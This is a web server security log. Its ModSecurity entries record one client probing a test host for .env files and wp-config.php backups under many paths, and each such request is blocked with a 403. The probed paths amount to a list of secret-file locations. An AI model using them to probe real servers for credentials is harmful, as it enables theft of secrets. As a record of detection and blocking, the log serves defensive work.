[Sun Aug 10 18:02:05.342085 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.txt/html/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdMAAAAAI"]
[Sun Aug 10 18:02:05.342335 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.txt/html/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdMAAAAAI"]
[Sun Aug 10 18:02:05.342542 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.txt/html/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdMAAAAAI"]
[Sun Aug 10 18:02:05.363089 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJjCfSTM1z0kwYTEsGjdMQAAAAI"]
[Sun Aug 10 18:02:05.363365 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJjCfSTM1z0kwYTEsGjdMQAAAAI"]
[Sun Aug 10 18:02:05.363554 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJjCfSTM1z0kwYTEsGjdMQAAAAI"]
[Sun Aug 10 18:02:05.384279 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdMgAAAAI"]
[Sun Aug 10 18:02:05.384530 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdMgAAAAI"]
[Sun Aug 10 18:02:05.384725 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdMgAAAAI"]
[Sun Aug 10 18:02:05.482725 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.orig"] [unique_id "aJjCfSTM1z0kwYTEsGjdNQAAAAI"]
[Sun Aug 10 18:02:05.482993 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.orig"] [unique_id "aJjCfSTM1z0kwYTEsGjdNQAAAAI"]
[Sun Aug 10 18:02:05.483186 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.orig"] [unique_id "aJjCfSTM1z0kwYTEsGjdNQAAAAI"]
[Sun Aug 10 18:02:05.503274 2025] [authz_core:error] [pid 1839636] [client 185.177.72.56:4414] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.ini
[Sun Aug 10 18:02:05.601773 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/html/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdOQAAAAI"]
[Sun Aug 10 18:02:05.602035 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/html/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdOQAAAAI"]
[Sun Aug 10 18:02:05.602233 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/html/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdOQAAAAI"]
[Sun Aug 10 18:02:05.661397 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "aJjCfSTM1z0kwYTEsGjdOwAAAAI"]
[Sun Aug 10 18:02:05.661649 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "aJjCfSTM1z0kwYTEsGjdOwAAAAI"]
[Sun Aug 10 18:02:05.662017 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "aJjCfSTM1z0kwYTEsGjdOwAAAAI"]
[Sun Aug 10 18:02:05.662291 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "aJjCfSTM1z0kwYTEsGjdOwAAAAI"]
[Sun Aug 10 18:02:05.682856 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdPAAAAAI"]
[Sun Aug 10 18:02:05.683094 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdPAAAAAI"]
[Sun Aug 10 18:02:05.683279 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdPAAAAAI"]
[Sun Aug 10 18:02:05.703313 2025] [authz_core:error] [pid 1839636] [client 185.177.72.56:4414] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configs
[Sun Aug 10 18:02:05.763499 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.txt"] [unique_id "aJjCfSTM1z0kwYTEsGjdPwAAAAI"]
[Sun Aug 10 18:02:05.763740 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.txt"] [unique_id "aJjCfSTM1z0kwYTEsGjdPwAAAAI"]
[Sun Aug 10 18:02:05.763920 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.txt"] [unique_id "aJjCfSTM1z0kwYTEsGjdPwAAAAI"]
[Sun Aug 10 18:02:05.786989 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdQAAAAAI"]
[Sun Aug 10 18:02:05.787239 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdQAAAAAI"]
[Sun Aug 10 18:02:05.787429 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdQAAAAAI"]
[Sun Aug 10 18:02:05.807877 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdQQAAAAI"]
[Sun Aug 10 18:02:05.808132 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdQQAAAAI"]
[Sun Aug 10 18:02:05.808318 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdQQAAAAI"]
[Sun Aug 10 18:02:05.828797 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdQgAAAAI"]
[Sun Aug 10 18:02:05.829039 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdQgAAAAI"]
[Sun Aug 10 18:02:05.829223 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdQgAAAAI"]
[Sun Aug 10 18:02:05.849857 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdQwAAAAI"]
[Sun Aug 10 18:02:05.850127 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdQwAAAAI"]
[Sun Aug 10 18:02:05.850363 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdQwAAAAI"]
[Sun Aug 10 18:02:05.870949 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdRAAAAAI"]
[Sun Aug 10 18:02:05.871197 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdRAAAAAI"]
